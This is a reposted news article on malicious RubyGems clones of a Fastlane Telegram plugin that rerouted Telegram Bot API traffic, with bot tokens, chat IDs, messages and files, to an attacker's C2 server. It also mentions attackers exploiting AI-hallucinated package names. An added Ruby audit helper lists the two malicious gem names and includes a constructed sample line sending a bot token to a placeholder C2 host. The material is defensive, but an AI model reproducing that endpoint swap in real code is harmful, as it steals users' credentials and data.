
Supply chain attack hits RubyGems to steal Telegram API data – Source: www.csoonline.com


Source: www.csoonline.com – Author:

Threat actor exploits Fastlane plugin trust to redirect Telegram traffic via C2 server after Vietnam’s ban, targeting mobile app CI/CD pipelines.

An ongoing supply chain attack is targeting the RubyGems ecosystem to publish malicious packages intended to steal sensitive Telegram data.

Published by a threat actor using multiple accounts under aliases Bùi nam, buidanhnam, and si_mobile, the malicious gems (ruby packages) pose as legitimate Fastlane plugins and exfiltrate data to an actor-controlled command and control (C2) server. Fastlane is a popular open-source tool, used extensively in CI/CD pipelines, to automate building, testing, and releasing mobile apps (iOS and Android).

“Malicious actors take advantage of the trust inherent in open-source environments by embedding harmful code that can jeopardize systems, steal sensitive information, or, in this case, misdirect critical API traffic,” said Eric Schwake, director of cybersecurity strategy at Salt Security. “The identification of certain Ruby gems aimed at exfiltrating Telegram API tokens and messages highlights a significant and ongoing risk to the software supply chain.”

The ongoing attack was first spotted by Socket’s Threat Research Team, who noted that the malicious gems appeared just days after Vietnam’s nationwide Telegram ban, likely to exploit the heightened demand for Telegram workarounds with “proxy” offerings.

Two rogue plugins in circulation

The threat actor published two malicious gems, “fastlane-plugin-telegram-proxy” and “fastlane-plugin-proxy_telegram,” near-identical clones of the legitimate “fastlane-plugin-telegram.”

While the packages retained the same functionality and documentation as the legitimate plugin, they added one critical alteration: the modified gems redirected all Telegram API traffic to an actor-controlled C2 server.

“These gems silently exfiltrate all data sent to the Telegram API (used by the Fastlane plugin) by redirecting traffic through a C2 server controlled by the threat actor,” security researcher Kirill Boychenko said in a blog post. “This includes bot tokens, chat IDs, message content, and attached files.”

The threat actors modified the legitimate plugin’s behavior of sending messages to Telegram through the Telegram Bot API by replacing the Telegram API endpoint (https://api.telegram.org) with their own C2 server.

“A single line swap rerouted every Telegram API call through a Cloudflare Worker under an attacker’s control, siphoning tokens, files, IDs, and more,” said Jason Soroko, Senior Fellow at Sectigo.

Risk may extend past the regional ban

The malicious packages (gems) were published by the threat actor on May 24, 2025, three days after Vietnam’s Ministry of Information and Communications ordered a nationwide ban on Telegram and gave internet service providers until June 2 to report compliance.

Apart from the timing, the aliases used by the threat actor also suggested a Vietnamese theme, as did the “Telegram proxy” hook used to market the gems. While seemingly targeted, the attack may still have an impact beyond the region affected by the ban.

“The operator, using Vietnamese-language aliases, pushed the gems days after Vietnam banned Telegram, but the code has no geofence, so any Fastlane pipeline that pulled the plugin was compromised,” Soroko explained.

For potential targets, Boychenko recommended verifying Telegram proxies—if they are looking for one—by checking for open-source licensing, transparent author details, configurable endpoints (not silent, hardcoded replacements), and clear privacy and logging policies. Typosquatting dependencies remain a popular supply chain attack technique.
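An added example, not code from the article, from Socket, or from the Fastlane project: a small Ruby audit helper that flags the two clone gem names named above and scans a plugin’s source for Telegram Bot API calls routed anywhere other than api.telegram.org, reporting runtime-resolved hosts separately so a reviewer can confirm they are genuinely configurable rather than a hidden default. The plugin snippets it checks are constructed, and `c2.example.invalid` is a placeholder for the actor’s Cloudflare Worker host, which the article does not name.

```ruby
# Added example (not from the article, Socket, or Fastlane): audit a Fastlane
# plugin by gem name and by where its Telegram Bot API traffic is sent.

# The two clone gems named in the article.
MALICIOUS_GEMS = %w[fastlane-plugin-telegram-proxy fastlane-plugin-proxy_telegram].freeze
LEGIT_TELEGRAM_HOST = 'api.telegram.org'.freeze

# Returns an array of finding strings; an empty array means nothing suspicious.
def audit_telegram_plugin(gem_name, source)
  findings = []
  if MALICIOUS_GEMS.include?(gem_name)
    findings << "gem name matches a known malicious clone: #{gem_name}"
  end

  # Pull every http(s) URL literal out of the source. Ruby interpolation
  # markers (#{...}) are kept so a runtime-resolved host can be recognised.
  source.scan(%r{https?://[^"'\s)]+}) do |url|
    host = url[%r{\Ahttps?://([^/]+)}, 1]
    next if host.nil?
    bot_api_call = url.match?(%r{/bot[^/]*/}) # Bot API path: /bot<token>/<method>

    if host.include?('#{')
      findings << "host is resolved at runtime (#{host}); confirm it is user-configurable"
    elsif bot_api_call && host != LEGIT_TELEGRAM_HOST
      findings << "Telegram Bot API traffic routed to unexpected host: #{host}"
    end
  end
  findings
end

# Constructed samples (single-quoted heredocs keep #{...} literal, as in plugin source).
LEGIT_SOURCE = <<~'RUBY'
  uri = URI("https://api.telegram.org/bot#{token}/sendMessage")
RUBY

# Same call with the endpoint swapped, as the article describes; host is a placeholder.
CLONE_SOURCE = <<~'RUBY'
  uri = URI("https://c2.example.invalid/bot#{token}/sendMessage")
RUBY

# A configurable endpoint, which the article lists as a sign of a trustworthy proxy.
CONFIGURABLE_SOURCE = <<~'RUBY'
  uri = URI("https://#{params[:api_host]}/bot#{token}/sendMessage")
RUBY
```

Run it against each gem in a pipeline’s Gemfile.lock and treat any “unexpected host” finding as a blocker until the plugin source has been read by hand.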

Recently, attackers were found dropping over 60 malicious npm packages within two weeks to steal network information, a discovery also reported by Boychenko. Malicious actors have also begun exploiting AI hallucinations in a novel approach known as SlopSquatting, publishing malicious packages under names that AI tools might incorrectly suggest to developers.


Original Post url: https://www.csoonline.com/article/4002437/supply-chain-attack-hits-rubygems-to-steal-telegram-api-data.html

Category & Tags: APIs, Malware, Security – APIs, Malware, Security
